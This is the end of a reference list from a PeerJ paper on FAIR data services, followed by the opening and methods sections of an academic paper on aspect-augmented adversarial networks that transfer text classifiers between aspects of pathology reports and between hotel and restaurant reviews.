scholarly publications. peerj computer science :e doi . /peerj-cs. . 
stein ld, knoppers bm, campbell p, getz g, korbel jo. . data analysis: create a cloud commons. nature : – doi . / a. stevens rd, robinson aj, goble ca. . mygrid: personalised bioinformatics on the information grid. bioinformatics (suppl ):i –i doi . /bioinformatics/btg . thompson r, johnston l, taruscio d, monaco l, béroud c, gut ig, hansson mg, ’t hoen p-ba, patrinos gp, dawkins h, ensini m, zatloukal k, koubi d, heslop e, paschall je, posada m, robinson pn, bushby k, lochmüller h. . rd- connect: an integrated platform connecting databases, registries, biobanks and clinical bioinformatics for rare disease research. journal of general internal medicine (suppl ):s –s doi . /s - - - . van ommen g-jb, törnwall o, bréchot c, dagher g, galli j, hveem k, landegren u, luchinat c, metspalu a, nilsson c, solesvik ov, perola m, litton j-e, zatloukal k. . bbmri-eric as a resource for pharmaceutical and life science industries: the development of biobank-based expert centres. european journal of human genetics: ejhg : – doi . /ejhg. . . verborgh r, dumontier m. . a web api ecosystem through feature-based reuse. arxiv preprint. arxiv: . . verborgh r, ruben v, sande mv, olaf h, van herwegen j, de vocht l, de meester b, gerald h, pieter c. . triple pattern fragments: a low-cost knowledge graph interface for the web. web semantics: science, services and agents on the world wide web – : – . w c. . data catalog vocabulary (dcat). available at http://www.w .org/tr/ vocab-dcat (accessed on december ). wilkinson md, dumontier m, aalbersberg ijj, appleton g, axton m, baak a, blomberg n, boiten j-w, da silva santos lb, bourne pe, bouwman j, brookes aj, wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /nar/gkv https://www.w .org/tr/ldp/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . / a http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ejhg. . http://arxiv.org/abs/ . http://www.w .org/tr/vocab-dcat http://www.w .org/tr/vocab-dcat http://dx.doi.org/ . /peerj-cs. clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez- beltran a, gray ajg, groth p, goble c, grethe js, heringa j, hoen pac, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, schaik r, sansone s-a, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, mons b. . the fair guiding principles for scientific data management and stewardship. scientific data : doi . /sdata. . . wilkinson md, senger m, kawas e, bruskiewich r, gouzy j, noirot c, bardou p, ng a, haase d, saiz eda, wang d, gibbons f, gordon pmk, sensen cw, carrasco jmr, fernández jm, shen l, links m, ng m, opushneva n, neerincx pbt, leunissen jam, ernst r, twigger s, usadel b, good b, wong y, stein l, crosby w, karlsson j, royo r, párraga i, ramírez s, gelpi jl, trelles o, pisano dg, jimenez n, ker- hornou a, rosset r, zamacola l, tarraga j, huerta-cepas j, carazo jm, dopazo j, guigo r, navarro a, orozco m, valencia a, claros mg, pérez aj, aldana j, rojano mm, fernandez-santa cruz r, navas i, schiltz g, farmer a, gessler d, schoof h, groscurth a. . interoperability with moby . –it’s better than sharing your toothbrush!. briefings in bioinformatics : – doi . /bib/bbn . wilkinson md, vandervalk b, mccarthy l. . 
the semantic automated discovery and integration (sadi) web service design-pattern, api and reference implementa- tion. journal of biomedical semantics : doi . / - - - . withers d, kawas e, mccarthy l, vandervalk b, wilkinson m. . semantically- guided workflow construction in taverna: the sadi and biomoby plug-ins. in: isola : leveraging applications of formal methods, verification, and validation, – . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . /bib/bbn http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. aspect-augmented adversarial networks for domain adaptation yuan zhang, regina barzilay, and tommi jaakkola computer science and artificial intelligence laboratory massachusetts institute of technology {yuanzh, regina, tommi}@csail.mit.edu abstract we introduce a neural method for transfer learning between two (source and target) clas- sification tasks or aspects over the same do- main. rather than training on target la- bels, we use a few keywords pertaining to source and target aspects indicating sentence relevance instead of document class labels. documents are encoded by learning to em- bed and softly select relevant sentences in an aspect-dependent manner. a shared classi- fier is trained on the source encoded docu- ments and labels, and applied to target en- coded documents. we ensure transfer through aspect-adversarial training so that encoded documents are, as sets, aspect-invariant. ex- perimental results demonstrate that our ap- proach outperforms different baselines and model variants on two datasets, yielding an improvement of % on a pathology dataset and % on a review dataset. introduction many nlp problems are naturally multitask classi- fication problems. for instance, values extracted for different fields from the same document are often dependent as they share the same context. exist- ing systems rely on this dependence (transfer across fields) to improve accuracy. in this paper, we con- sider a version of this problem where there is a clear dependence between two tasks but annotations are available only for the source task. for example, the code is available at https://github.com/ yuanzh/aspect_adversarial. pathology report: • final diagnosis: breast (left) … invasive ductal carcinoma: identified. carcinoma tumor size: num cm. grade: . … lymphatic vessel invasion: identified. blood vessel invasion: suspicious. margin of invasive carcinoma … diagnosis results: source (idc): positive target (lvi): positive figure : a snippet of a breast pathology report with diagnosis results for two types of disease (aspects): carcinoma (idc) and lymph invasion (lvi). note how the same phrase indicating positive results (e.g. identified) is applicable to both aspects. a transfer model learns to map other key phrases (e.g. grade ) to such shared indicators. the target goal may be to classify pathology reports (shown in figure ) for the presence of lymph in- vasion but training data are available only for car- cinoma in the same reports. we call this problem aspect transfer as the objective is to learn to classify examples differently, focusing on different aspects, without access to target aspect labels. clearly, such transfer learning is possible only with auxiliary in- formation relating the tasks together. the key challenge is to articulate and incorpo- rate commonalities across the tasks. 
for instance, in classifying reviews of different products, sentiment words (referred to as pivots) can be shared across the products. this commonality enables one to align feature spaces across multiple products, enabling useful transfer (?). similar properties hold in other contexts and beyond sentiment analysis. figure transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumé iii . submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. shows that certain words and phrases like “identi- fied”, which indicates the presence of a histologi- cal property, are applicable to both carcinoma and lymph invasion. our method learns and relies on such shared indicators, and utilizes them for effec- tive transfer. the unique feature of our transfer problem is that both the source and the target classifiers operate over the same domain, i.e., the same examples. in this setting, traditional transfer methods will always pre- dict the same label for both aspects and thus lead- ing to failure. instead of supplying the target classi- fier with direct training labels, our approach builds on a secondary relationship between the tasks using aspect-relevance annotations of sentences. these relevance annotations indicate a possibility that the answer could be found in a sentence, not what the answer is. one can often write simple keyword rules that identify sentence relevance to a particular as- pect through representative terms, e.g., specific hor- monal markers in the context of pathology reports. annotations of this kind can be readily provided by domain experts, or extracted from medical literature such as codex rules in pathology (pantanowitz et al., ). we assume a small number of relevance an- notations (rules) pertaining to both source and target aspects as a form of weak supervision. we use this sentence-level aspect relevance to learn how to en- code the examples (e.g., pathology reports) from the point of view of the desired aspect. in our approach, we construct different aspect-dependent encodings of the same document by softly selecting sentences relevant to the aspect of interest. the key to effective transfer is how these encodings are aligned. this encoding mechanism brings the problem closer to the realm of standard domain adaptation, where the derived aspect-specific representations are considered as different domains. given these rep- resentations, our method learns a label classifier shared between the two domains. to ensure that it can be adjusted only based on the source class la- bels, and that it also reasonably applies to the tar- get encodings, we must align the two sets of en- coded examples. learning this alignment is pos- this alignment or invariance is enforced on the level of sets, not individual reports; aspect-driven encoding of any specific report should remain substantially different for the two tasks since the encoded examples are passed on to the same classifier. sible because, as discussed above, some keywords are directly transferable and can serve as anchors for constructing this invariant space. to learn this invariant representation, we introduce an adversar- ial domain classifier analogous to the recent suc- cessful use of adversarial training in computer vi- sion (ganin and lempitsky, ). the role of the domain classifier (adversary) is to learn to distin- guish between the two types of encodings. 
during training we update the encoder with an adversarial objective to cause the classifier to fail. the encoder therefore learns to eliminate aspect-specific infor- mation so that encodings look invariant (as sets) to the classifier, thus establishing aspect-invariance en- codings and enabling transfer. all three components in our approach, ) aspect-driven encoding, ) clas- sification of source labels, and ) domain adversary, are trained jointly (concurrently) to complement and balance each other. adversarial training of domain and label classi- fiers can be challenging to stabilize. in our setting, sentences are encoded with a convolutional model. feedback from adversarial training can be an un- stable guide for how the sentences should be en- coded. to address this issue, we incorporate an ad- ditional word-level auto-encoder reconstruction loss to ground the convolutional processing of sentences. we empirically demonstrate that this additional ob- jective yields richer and more diversified feature rep- resentations, improving transfer. we evaluate our approach on pathology reports (aspect transfer) as well as on a more standard re- view dataset (domain adaptation). on the pathology dataset, we explore cross-aspect transfer across dif- ferent types of breast disease. specifically, we test on six adaptation tasks, consistently outperforming all other baselines. overall, our full model achieves % and . % absolute improvement arising from aspect-driven encoding and adversarial training re- spectively. moreover, our unsupervised adaptation method is only . % behind the accuracy of a super- vised target model. on the review dataset, we test adaptations from hotel to restaurant reviews. our model outperforms the marginalized denoising au- toencoder (chen et al., ) by %. finally, we examine and illustrate the impact of individual com- ponents on the resulting performance. related work domain adaptation for deep learning exist- ing approaches commonly induce abstract represen- tations without pulling apart different aspects in the same example, and therefore are likely to fail on the aspect transfer problem. the majority of these prior methods first learn a task-independent representa- tion, and then train a label predictor (e.g. svm) on this representation in a separate step. for ex- ample, earlier researches employ a shared autoen- coder (glorot et al., ; chopra et al., ) to learn a cross-domain representation. chen et al. ( ) further improve and stabilize the represen- tation learning by utilizing marginalized denoising autoencoders. later, zhou et al. ( ) propose to minimize domain-shift of the autoencoder in a linear data combination manner. other researches have fo- cused on learning transferable representations in an end-to-end fashion. examples include using trans- duction learning for object recognition (sener et al., ) and using residual transfer networks for image classification (long et al., ). in contrast, we use adversarial training to encourage learning domain- invariant features in a more explicit way. our ap- proach offers another two advantages over prior work. first, we jointly optimize features with the final classification task while many previous works only learn task-independent features using autoen- coders. second, our model can handle traditional domain transfer as well as aspect transfer, while pre- vious methods can only handle the former. adversarial learning in vision and nlp our approach closely relates to the idea of domain- adversarial training. 
adversarial networks were originally developed for image generation (good- fellow et al., ; makhzani et al., ; sprin- genberg, ; radford et al., ; taigman et al., ), and were later applied to domain adaptation in computer vision (ganin and lempitsky, ; ganin et al., ; bousmalis et al., ; tzeng et al., ) and speech recognition (shinohara, ). the core idea of these approaches is to promote the emergence of invariant image features by optimizing the feature extractor as an adversary against the do- main classifier. while ganin et al. ( ) also apply this idea to sentiment analysis, their practical gains have remained limited. our approach presents two main departures. in computer vision, adversarial learning has been used for transferring across domains, while our method can also handle aspect transfer. in addition, we in- troduce a reconstruction loss which results in more robust adversarial training. we believe that this for- mulation will benefit other applications of adversar- ial training, beyond the ones described in this paper. semi-supervised learning with keywords in our work, we use a small set of keywords as a source of weak supervision for aspect-relevance scoring. this relates to prior work on utilizing prototypes and seed words in semi-supervised learning (haghighi and klein, ; grenager et al., ; chang et al., ; mann and mccallum, ; jagarlamudi et al., ; li et al., ; eisenstein, ). all these prior approaches utilize prototype annotations primarily targeting model bootstrapping but not for learning representations. in contrast, our model uses provided keywords to learn aspect-driven encoding of input examples. attention mechanism in nlp one may view our aspect-relevance scorer as a sentence-level “semi-supervised attention”, in which relevant sen- tences receive more attention during feature extrac- tion. while traditional attention-based models typ- ically induce attention in an unsupervised manner, they have to rely on a large amount of labeled data for the target task (bahdanau et al., ; rush et al., ; chen et al., ; cheng et al., ; xu et al., ; xu and saenko, ; yang et al., ; martins and astudillo, ; lei et al., ). unlike these methods, our approach assumes no label annotations in the target domain. other re- searches have focused on utilizing human-provided rationales as “supervised attention” to improve pre- diction (zaidan et al., ; marshall et al., ; zhang et al., ; brun et al., ). in contrast, our model only assumes access to a small set of key- words as a source of weak supervision. moreover, all these prior approaches focus on in-domain clas- sification. in this paper, however, we study the task in the context of domain adaptation. multitask learning existing multitask learn- ing methods focus on the case where supervision is available for all tasks. a typical architecture in- volves using a shared encoder with a separate clas- sifier for each task. (caruana, ; pan and yang, ; collobert and weston, ; liu et al., ; bordes et al., ). in contrast, our work assumes labeled data only for the source aspect. we train a single classifier for both aspects by learning aspect- invariant representation that enables the transfer. problem formulation we begin by formalizing aspect transfer with the idea of differentiating it from standard domain adap- tation. in our setup, we have two classification tasks called the source and the target tasks. 
in contrast to source and target tasks in domain adaptation, both of these tasks are defined over the same set of examples (here documents, e.g., pathology reports). what differentiates the two classification tasks is that they pertain to different aspects in the examples. if each training document were annotated with both the source and the target aspect labels, the problem would reduce to multi-label classification. however, in our setting training labels are available only for the source aspect, so the goal is to solve the target task without any associated training label.

to fix the notation, let $d = \{s_i\}_{i=1}^{|d|}$ be a document that consists of a sequence of $|d|$ sentences $s_i$. given a document $d$ and the aspect of interest, we wish to predict the corresponding aspect-dependent class label $y$ (e.g., $y \in \{-1, 1\}$). we assume that the set of possible labels is the same across aspects. we use $y^s_{l;k}$ to denote the $k$-th coordinate of a one-hot vector indicating the correct training source-aspect label for document $d_l$. target aspect labels are not available during training.

beyond labeled documents for the source aspect $\{d_l, y^s_l\}_{l \in L}$, and shared unlabeled documents for source and target aspects $\{d_l\}_{l \in U}$, we assume further that we have relevance scores pertaining to each aspect. the relevance is given per sentence, for some subset of sentences across the documents, and indicates the possibility that the answer for that document would be found in the sentence, without indicating which way the answer goes. relevance is always aspect dependent yet often easy to provide in the form of simple keyword rules.

we use $r^a_i \in \{0, 1\}$ to denote the given relevance label pertaining to aspect $a$ for sentence $s_i$. only a small subset of sentences in the training set have associated relevance labels. let $R = \{(a, l, i)\}$ denote the index set of relevance labels, such that if $(a, l, i) \in R$ then aspect $a$'s relevance label $r^a_{l,i}$ is available for the $i$-th sentence in document $d_l$. in our case relevance labels arise from aspect-dependent keyword matches: $r^a_i = 1$ when the sentence contains any keywords pertaining to aspect $a$, and $r^a_i = 0$ if it has any keywords of other aspects (a sentence that contains keywords pertaining to both aspect $a$ and other aspects receives $r^a_i = 1$). separate subsets of relevance labels are available for each aspect as the keywords differ.

the transfer that is sought here is between two tasks over the same set of examples rather than between two different types of examples for the same task, as in standard domain adaptation. however, the two formulations can be reconciled if full relevance annotations are assumed to be available during training and testing. in this scenario, we could simply lift the sets of relevant sentences from each document as new types of documents. the goal would then be to learn to classify documents of type t (consisting of sentences relevant to the target aspect) based on having labels only for type s (source) documents, a standard domain adaptation task. our problem is more challenging as the aspect-relevance of sentences must be learned from limited annotations.

finally, we note that the aspect transfer problem and the method we develop to solve it work the same even when source and target documents are a priori different, something we will demonstrate later.
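as a concrete illustration of how such keyword rules induce relevance labels, the following minimal python sketch (ours, for illustration only; the aspect names and keywords follow the examples in table [2] below, and the helper name is an assumption) labels a sentence with $r = 1$ when it mentions a keyword of the chosen aspect, $r = 0$ when it mentions only keywords of other aspects, and leaves it unlabeled otherwise.

```python
# minimal sketch of keyword-based relevance labeling (illustrative, not the authors' code)
from typing import Optional

# example keyword rules for two of the pathology aspects (cf. table [2])
ASPECT_KEYWORDS = {
    "idc": ["idc", "invasive ductal carcinoma"],
    "alh": ["alh", "atypical lobular hyperplasia"],
}

def relevance_label(sentence: str, aspect: str) -> Optional[int]:
    """Return 1 if the sentence matches a keyword of `aspect`, 0 if it matches only
    keywords of other aspects, and None (no supervision) if no keyword matches."""
    text = sentence.lower()
    hits_this = any(kw in text for kw in ASPECT_KEYWORDS[aspect])
    hits_other = any(
        kw in text
        for other, kws in ASPECT_KEYWORDS.items() if other != aspect
        for kw in kws
    )
    if hits_this:
        return 1      # positive relevance label, r = 1 (chosen aspect takes precedence)
    if hits_other:
        return 0      # negative relevance label, r = 0
    return None       # sentence carries no relevance supervision

# usage
print(relevance_label("invasive ductal carcinoma: identified.", "idc"))  # 1
print(relevance_label("invasive ductal carcinoma: identified.", "alh"))  # 0
print(relevance_label("margins are clear.", "idc"))                      # None
```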
methods

overview of our approach

our model consists of three key components, as shown in figure [2]. each document is encoded in a relevance-weighted, aspect-dependent manner (green, left part of the figure) and classified using the label predictor (blue, top-right). during training, the encoded documents are also passed on to the domain classifier (orange, bottom-right). the role of the domain classifier, as the adversary, is to ensure that the aspect-dependent encodings of documents are distributionally matched. this matching justifies the use of the same end-classifier to provide the predicted label regardless of the task (aspect).

figure [2]: aspect-augmented adversarial network for transfer learning. the model is composed of (a) an aspect-driven document encoder, (b) a label predictor and (c) a domain classifier. sentence embeddings are scored for relevance, combined into a weighted document representation, passed through a transformation layer, and fed both to the label predictor (objective: predict labels) and to the domain classifier (objective: predict domains), with the encoder trained to confuse the latter.

to encode a document, the model first maps each sentence into a vector and then passes the vector to a scoring network to determine whether the sentence is relevant for the chosen aspect. these predicted relevance scores are used to obtain document vectors by taking a relevance-weighted sum of the associated sentence vectors. thus, the manner in which the document vector is constructed is always aspect-dependent due to the chosen relevance weights.

during training, the resulting adjusted document vectors are consumed by the two classifiers. the primary label classifier aims to predict the source labels (when available), while the domain classifier determines whether the document vector pertains to the source or target aspect, which is the label that we know by construction. furthermore, we jointly update the document encoder with a reverse of the gradient from the domain classifier, so that the encoder learns to induce document representations that fool the domain classifier. the resulting encoded representations will be aspect-invariant, facilitating transfer.

our adversarial training scheme uses all the training losses concurrently to adjust the model parameters. during testing, we simply encode each test document in a target-aspect dependent manner and apply the same label predictor. we expect that the same label classifier does well on the target task since it solves the source task and operates on relevance-weighted representations that are matched across the tasks. while our method is designed to work in the extreme setting that the examples for the two aspects are the same, this is by no means a requirement; our method will also work fine in the more traditional domain adaptation setting, which we will demonstrate later.
components in detail

sentence embedding. we apply a convolutional model, illustrated in figure [3], to each sentence $s_i$ to obtain a sentence-level vector embedding $x^{sen}_i$. the use of rnns or bi-lstms would result in more flexible sentence embeddings, but based on our initial experiments we did not observe any significant gains over the simpler cnns.

figure [3]: illustration of the convolutional model and the reconstruction of word embeddings from the associated convolutional layer: word embeddings are convolved, max-pooled into a sentence vector $x^{sen} = \max\{h_1, h_2, \ldots\}$, and each word embedding is reconstructed as $\hat{x} = \tanh(W^c h + b^c)$.

we further ground the resulting sentence embeddings by including an additional word-level reconstruction step in the convolutional model. the purpose of this reconstruction step is to balance the adversarial training signals propagating back from the domain classifier. specifically, it forces the sentence encoder to keep rich word-level information, in contrast to adversarial training, which seeks to eliminate aspect-specific features. we provide an empirical analysis of the impact of this reconstruction in the experiment section.

more concretely, we reconstruct word embeddings from the corresponding convolutional layer, as shown in figure [3]. we use $x_{i,j}$ to denote the embedding of the $j$-th word in sentence $s_i$. let $h_{i,j}$ be the convolutional output when $x_{i,j}$ is at the center of the window. we reconstruct $x_{i,j}$ by

$$\hat{x}_{i,j} = \tanh(W^c h_{i,j} + b^c) \qquad (1)$$

where $W^c$ and $b^c$ are parameters of the reconstruction layer. the loss associated with the reconstruction for document $d$ is

$$\mathcal{L}_{rec}(d) = \frac{1}{N} \sum_{i,j} \left\lVert \hat{x}_{i,j} - \tanh(x_{i,j}) \right\rVert^2 \qquad (2)$$

where $N$ is the number of tokens in the document and the indices $i, j$ identify the sentence and word, respectively. the overall reconstruction loss $\mathcal{L}_{rec}$ is obtained by summing over all labeled/unlabeled documents.

relevance prediction. we use a small set of keyword rules to generate binary relevance labels, both positive ($r = 1$) and negative ($r = 0$). these labels represent the only supervision available to predict relevance. the prediction is made on the basis of the sentence vector $x^{sen}_i$ passed through a feed-forward network with a relu output unit. the network has a single shared hidden layer and a separate output layer for each aspect. note that our relevance prediction network is trained as a non-negative regression model even though the available labels are binary, as relevance varies on a linear rather than a binary scale. given relevance labels indexed by $R = \{(a, l, i)\}$, we minimize

$$\mathcal{L}_{rel} = \sum_{(a, l, i) \in R} \left( r^a_{l,i} - \hat{r}^a_{l,i} \right)^2 \qquad (3)$$

where $\hat{r}^a_{l,i}$ is the predicted (non-negative) relevance score pertaining to aspect $a$ for the $i$-th sentence in document $d_l$, as shown in the left part of figure [2], and $r^a_{l,i}$, defined earlier, is the given binary (0/1) relevance label. we use a score on a $[0, 1]$ scale because it can be naturally used as a weight for vector combinations, as shown next.

document encoding. the initial vector representation for each document, such as $d_l$, is obtained as a relevance-weighted combination of the associated sentence vectors, i.e.,

$$x^{doc,a}_l = \frac{\sum_i \hat{r}^a_{l,i} \, x^{sen}_{l,i}}{\sum_i \hat{r}^a_{l,i}} \qquad (4)$$

the resulting vector selectively encodes information from the sentences based on relevance to the focal aspect.
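the encoder components just described, namely the convolutional sentence embedding, the word reconstruction of equations (1) and (2), the relevance scorer, and the relevance-weighted document vector of equation (4), can be summarized in code. the following pytorch sketch is ours, written only to make these pieces concrete; it is not the authors' released implementation, and the layer sizes, kernel width, and class/function names are assumptions.

```python
# minimal illustrative sketch of the aspect-driven encoder (not the authors' code)
import torch
import torch.nn as nn
import torch.nn.functional as F

class AspectEncoder(nn.Module):
    def __init__(self, vocab_size=10000, emb_dim=100, hidden_dim=150, num_aspects=2):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, emb_dim)
        # convolution over word embeddings; padding keeps one output per word
        self.conv = nn.Conv1d(emb_dim, hidden_dim, kernel_size=3, padding=1)
        # word-level reconstruction head, cf. equation (1)
        self.recon = nn.Linear(hidden_dim, emb_dim)
        # relevance scorer: shared hidden layer, one output per aspect
        self.rel_hidden = nn.Linear(hidden_dim, hidden_dim)
        self.rel_out = nn.Linear(hidden_dim, num_aspects)

    def forward(self, sentences, aspect):
        """sentences: LongTensor [num_sentences, max_len]; aspect: int index."""
        x = self.embed(sentences)                       # [S, T, emb]
        h = torch.relu(self.conv(x.transpose(1, 2)))    # [S, hidden, T]
        sen_vec = h.max(dim=2).values                   # max-pooling -> [S, hidden]
        # word reconstruction and its loss, cf. equation (2)
        x_hat = torch.tanh(self.recon(h.transpose(1, 2)))        # [S, T, emb]
        rec_loss = F.mse_loss(x_hat, torch.tanh(x))
        # non-negative relevance scores for the chosen aspect
        rel = torch.relu(self.rel_out(torch.relu(self.rel_hidden(sen_vec))))[:, aspect]
        # relevance-weighted document vector, cf. equation (4)
        doc_vec = (rel.unsqueeze(1) * sen_vec).sum(0) / (rel.sum() + 1e-8)
        return doc_vec, rel, rec_loss

# usage: encode a toy "document" of 4 sentences, 12 tokens each, w.r.t. aspect 0
encoder = AspectEncoder()
doc = torch.randint(0, 10000, (4, 12))
doc_vec, rel_scores, rec_loss = encoder(doc, aspect=0)
print(doc_vec.shape, rel_scores.shape, rec_loss.item())
```

max-pooling over the convolutional outputs yields one fixed-size vector per sentence, while the reconstruction head is applied per position, so word-level information can survive the adversarial updates.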
transformation layer. the manner in which document vectors arise from sentence vectors means that they will retain aspect-specific information that will hinder transfer across aspects. to help remove non-transferable information, we add a transformation layer to map the initial document vectors $x^{doc,a}_l$ to their domain-invariant (as a set) versions, as shown in figure [2]. specifically, the transformed representation is given by $x^{tr,a}_l = W^{tr} x^{doc,a}_l$. meanwhile, the transformation has to be strongly regularized lest the gradient from the adversary would wipe out all the document signal. we add the following regularization term

$$\Omega_{tr} = \lambda^{tr} \left\lVert W^{tr} - I \right\rVert^2_F \qquad (5)$$

to discourage significant deviation away from identity $I$. $\lambda^{tr}$ is a regularization parameter that has to be set separately based on validation performance. we show an empirical analysis of the impact of this transformation layer in the analysis section.

primary label classifier. as shown in the top-right part of figure [2], the classifier takes in the adjusted document representation as an input and predicts a probability distribution over the possible class labels. the classifier is a feed-forward network with a single hidden layer using relu activations and a softmax output layer over the possible class labels. note that we train only one label classifier that is shared by both aspects. the classifier operates the same regardless of the aspect to which the document was encoded. it must therefore be cooperatively learned together with the encodings. let $\hat{p}_{l;k}$ denote the predicted probability of class $k$ for document $d_l$ when the document is encoded from the point of view of the source aspect. recall that $[y^s_{l;1}, \ldots, y^s_{l;m}]$ is a one-hot vector for the correct (given) source class label for document $d_l$, hence also a distribution. we use the cross-entropy loss for the label classifier:

$$\mathcal{L}_{lab} = \sum_{l \in L} \left[ -\sum_{k=1}^{m} y^s_{l;k} \log \hat{p}_{l;k} \right] \qquad (6)$$

domain classifier. as shown in the bottom-right part of figure [2], the domain classifier functions as an adversary to ensure that the documents encoded with respect to the source and target aspects look the same as sets of examples. the invariance is achieved when the domain classifier (as the adversary) fails to distinguish between the two. structurally, the domain classifier is a feed-forward network with a single relu hidden layer and a softmax output layer over the two aspect labels. let $y^a = [y^a_1, y^a_2]$ denote the one-hot domain label vector for aspect $a \in \{s, t\}$; in other words, $y^s = [1, 0]$ and $y^t = [0, 1]$. we use $\hat{q}_k(x^{tr,a}_l)$ as the predicted probability that the domain label is $k$ when the domain classifier receives $x^{tr,a}_l$ as the input. the domain classifier is trained to minimize

$$\mathcal{L}_{dom} = \sum_{l \in L \cup U} \sum_{a \in \{s, t\}} \left[ -\sum_{k=1}^{2} y^a_k \log \hat{q}_k(x^{tr,a}_l) \right] \qquad (7)$$

joint learning. we combine the individual component losses pertaining to word reconstruction, relevance labels, transformation layer regularization, source class labels, and domain adversary into an overall objective function

$$\mathcal{L}_{all} = \mathcal{L}_{rec} + \mathcal{L}_{rel} + \Omega_{tr} + \mathcal{L}_{lab} - \rho \mathcal{L}_{dom} \qquad (8)$$

which is minimized with respect to the model parameters except for the adversary (domain classifier). the adversary is maximizing the same objective with respect to its own parameters. the last term $-\rho \mathcal{L}_{dom}$ corresponds to the objective of causing the domain classifier to fail. the proportionality constant $\rho$ controls the impact of gradients from the adversary on the document representation; the adversary itself is always directly minimizing $\mathcal{L}_{dom}$.
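in practice, the minimax in equation (8) is typically realized with a gradient reversal layer, in the spirit of ganin and lempitsky's domain-adversarial training: the layer is the identity in the forward pass and multiplies the gradient by $-\rho$ in the backward pass, so a single backpropagation step lets the domain classifier minimize $\mathcal{L}_{dom}$ while pushing the encoder in the opposite direction. the pytorch sketch below is ours, for illustration only; the classifier shapes and the hidden size are assumptions, not values from this paper.

```python
# illustrative gradient-reversal layer and joint loss (not the authors' code)
import torch
import torch.nn as nn
import torch.nn.functional as F

class GradReverse(torch.autograd.Function):
    @staticmethod
    def forward(ctx, x, rho):
        ctx.rho = rho
        return x.view_as(x)                    # identity in the forward pass

    @staticmethod
    def backward(ctx, grad_output):
        return -ctx.rho * grad_output, None    # reversed, scaled gradient to the encoder

def grad_reverse(x, rho=1.0):
    return GradReverse.apply(x, rho)

hidden = 150                                   # assumed size
label_clf = nn.Sequential(nn.Linear(hidden, hidden), nn.ReLU(), nn.Linear(hidden, 2))
domain_clf = nn.Sequential(nn.Linear(hidden, hidden), nn.ReLU(), nn.Linear(hidden, 2))

def joint_loss(src_doc, tgt_doc, src_label, rec_loss, rel_loss, omega_tr, rho=1.0):
    """src_doc/tgt_doc: [batch, hidden] transformed document vectors."""
    # cross-entropy of equation (6), averaged over the batch
    lab_loss = F.cross_entropy(label_clf(src_doc), src_label)
    # domain classification of equation (7) on reversed-gradient inputs
    dom_logits = domain_clf(grad_reverse(torch.cat([src_doc, tgt_doc]), rho))
    dom_target = torch.cat([torch.zeros(len(src_doc), dtype=torch.long),
                            torch.ones(len(tgt_doc), dtype=torch.long)])
    dom_loss = F.cross_entropy(dom_logits, dom_target)
    # equation (8): the reversal layer supplies the -rho factor for the encoder,
    # while the domain classifier itself still minimizes dom_loss
    return rec_loss + rel_loss + omega_tr + lab_loss + dom_loss

# toy usage
src = torch.randn(8, hidden, requires_grad=True)
tgt = torch.randn(8, hidden, requires_grad=True)
loss = joint_loss(src, tgt, torch.randint(0, 2, (8,)),
                  rec_loss=torch.tensor(0.1), rel_loss=torch.tensor(0.1),
                  omega_tr=torch.tensor(0.0))
loss.backward()
print(loss.item())
```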
all the parameters are optimized jointly using standard backpropagation (concurrent for the adversary). each mini-batch is balanced by aspect, half coming from the source and the other half from the target. all the loss functions except $\mathcal{L}_{lab}$ make use of both labeled and unlabeled documents. additionally, it would be straightforward to add a loss term for target labels if they are available.

experimental setup

pathology dataset. this dataset contains . k breast pathology reports collected from three hospitals (yala et al., ). a portion of this dataset is manually annotated with categorical values representing various aspects of breast disease. in our experiments, we focus on four aspects related to carcinomas and atypias: ductal carcinoma in-situ (dcis), lobular carcinoma in-situ (lcis), invasive ductal carcinoma (idc) and atypical lobular hyperplasia (alh). each aspect is annotated using binary labels. we use held-out reports as our test set and use the rest of the labeled data as our training set: . k reports for dcis, . k for lcis, . k for idc, and . k for alh. table [1] summarizes statistics of the dataset.

table [1]: statistics of the pathology reports dataset (labeled reports for the dcis, lcis, idc and alh aspects plus shared unlabeled reports) and of the reviews dataset (labeled and unlabeled hotel reviews, unlabeled restaurant reviews) that we use for training. our model utilizes both labeled and unlabeled data.

we explore the adaptation problem from one aspect to another. for example, we want to train a model on annotations of dcis and apply it to lcis. for each aspect, we use up to three common names as a source of supervision for learning the relevance scorer, as illustrated in table [2]. note that the provided list is by no means exhaustive; in fact, buckley et al. ( ) provide examples of different verbalizations of lcis, not counting negations.

table [2]: examples of aspects and their corresponding keywords (case insensitive) in the pathology dataset.

aspect | keywords
idc | idc, invasive ductal carcinoma
alh | alh, atypical lobular hyperplasia

review dataset. our second experiment is based on a domain transfer of sentiment classification. for the source domain, we use the hotel review dataset introduced in previous work (wang et al., ; wang et al., ), and for the target domain, we use the restaurant review dataset from yelp (the restaurant portion of https://www.yelp.com/dataset_challenge). both datasets have ratings on a scale of to stars. following previous work (blitzer et al., ), we label reviews with ratings > as positive and those with ratings < as negative, discarding the rest. the hotel dataset includes a total of around k reviews collected from tripadvisor (https://www.tripadvisor.com/), so we split k as labeled and the other k as unlabeled data. we randomly select k restaurant reviews as the unlabeled data in the target domain. our test set consists of k reviews. table [1] summarizes the statistics of the review dataset.

the hotel reviews naturally have ratings for six aspects, including value, room quality, checkin service, room service, cleanliness and location. we use the first five aspects because the sixth aspect, location, has positive labels for over % of the reviews, and thus the trained model would suffer from the lack of negative examples. the restaurant reviews, however, only have single ratings for an overall impression. therefore, we explore the task of adaptation from each of the five hotel aspects to the restaurant domain. the hotel reviews dataset also provides a total of keywords for different aspects, generated by the bootstrapping method used in wang et al. ( ); we use those keywords as supervision for learning the relevance scorer.

